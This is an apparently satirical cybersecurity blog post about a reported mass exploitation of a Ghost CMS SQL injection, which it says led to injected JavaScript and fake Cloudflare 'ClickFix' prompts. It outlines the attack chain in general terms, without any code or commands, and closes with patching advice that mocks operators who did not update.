Cybersecurity May 25, 2026 · 4 min read

Ghost CMS SQL Injection Compromises 700 Websites Including Harvard and Oxford — The Patch Was Available for 95 Days but the Attackers Read the Changelog First

🤚 The Open-Palm Injection

A critical SQL injection vulnerability in Ghost CMS — tracked as CVE-2026-26980 — is being actively exploited in a large-scale campaign that has already compromised over 700 websites, including domains belonging to Harvard University, Oxford University, Auburn University, and, in a particularly poetic twist, DuckDuckGo.

The vulnerability affects Ghost versions 3.24.0 through 6.19.0 and was patched back in February 2026 with version 6.19.1. The patch has been available for three months. The attackers, naturally, have been more diligent about reading the changelog than the people running the software.

The campaign was discovered by XLab threat intelligence researchers at Qianxin, with SentinelOne publishing technical details on February 27. The attack chain is a masterclass in layered exploitation:

  • Attackers exploit the SQL injection to steal admin API keys
  • They use the elevated privileges to inject malicious JavaScript into published articles
  • The JavaScript acts as a lightweight loader that fetches second-stage code from attacker infrastructure
  • Qualifying visitors receive a fake Cloudflare verification prompt
  • The prompt instructs users to paste commands into Windows Command Prompt
  • This drops payloads including DLL loaders, JavaScript droppers, and an Electron-based malware called UtilifySetup.exe

👐 The Two-Handed Postmortem

The ClickFix social engineering technique deserves special recognition here, because it represents a genuinely innovative approach to the ancient art of getting humans to destroy their own computers.

The attack presents victims with what appears to be a legitimate Cloudflare verification page — the kind you’ve clicked through a thousand times without thinking. Except this one asks you to open Command Prompt and paste in a string of text. And people do it. They do it because Cloudflare prompts are so ubiquitous that they’ve become invisible, and because the average internet user has been trained to click “Verify” on anything that stands between them and the content they want to read.

The fact that DuckDuckGo — the privacy-focused search engine — was among the compromised domains is the kind of irony that security researchers will be dining out on for years. The website that promises to protect your privacy was, for a time, actively participating in the compromise of your system. Not on purpose, obviously. But the malware doesn’t care about your mission statement.

And then there are the universities. Harvard and Oxford — institutions that collectively charge enough tuition to fund a small nation’s defense budget — were running unpatched Ghost CMS instances three months after a critical patch was available. The irony of an Ivy League institution failing to do its homework writes itself.

🌿 The Gentle Awakening

Every major CMS vulnerability follows the same lifecycle, and it is a lifecycle that should embarrass everyone involved.

Step 1: A critical vulnerability is discovered and responsibly disclosed. Step 2: A patch is released. Step 3: The patch is ignored by approximately everyone. Step 4: Attackers read the patch notes — because they have a professional development culture — and begin mass exploitation. Step 5: Headlines. Step 6: Frantic patching. Step 7: A blog post titled “Lessons Learned” that will itself be ignored.

We are currently at Step 5. The patch for CVE-2026-26980 has been available since February 19, 2026. That is 95 days. Ninety-five days during which over 700 organizations — including some of the most prestigious academic institutions on the planet — decided that updating their CMS was not a priority. The attackers, meanwhile, had their exploit weaponized and their ClickFix infrastructure deployed before the end of the month.

The asymmetry is staggering. Defenders had 95 days and did nothing. Attackers had 8 days and built a global campaign.

👑 The Gold-Leaf Reckoning

Ghost CMS markets itself as the “professional publishing platform” — a sleek, modern alternative to WordPress for creators who want something that feels less like a construction site and more like a boutique hotel. And to its credit, the Ghost team shipped the patch promptly. The failure here is entirely on the operators.

But this campaign also highlights the growing sophistication of ClickFix as an attack vector. We’ve moved from crude pop-ups saying “YOUR COMPUTER HAS A VIRUS” to pixel-perfect replicas of Cloudflare verification flows that would fool most security professionals on a distracted Tuesday afternoon. The social engineering layer is now better designed than most legitimate UX. The attackers have a design team. The attackers have user research.

If you’re running Ghost CMS anywhere in the 3.24.0 to 6.19.0 range: update immediately. Check XLab’s published indicators of compromise. Review your published articles for injected JavaScript. And perhaps consider setting a calendar reminder for the next time a critical patch drops, because the attackers already have one.

“The SQL injection was critical, the patch was prompt, and the update schedule was aspirational. Harvard can teach you about cybersecurity frameworks in a three-credit seminar — they just can’t apply them to their own blog.” — The Slap of Wisdom Incident Response Team, reading the CVE from a fully patched Ghost instance that we updated in February like professionals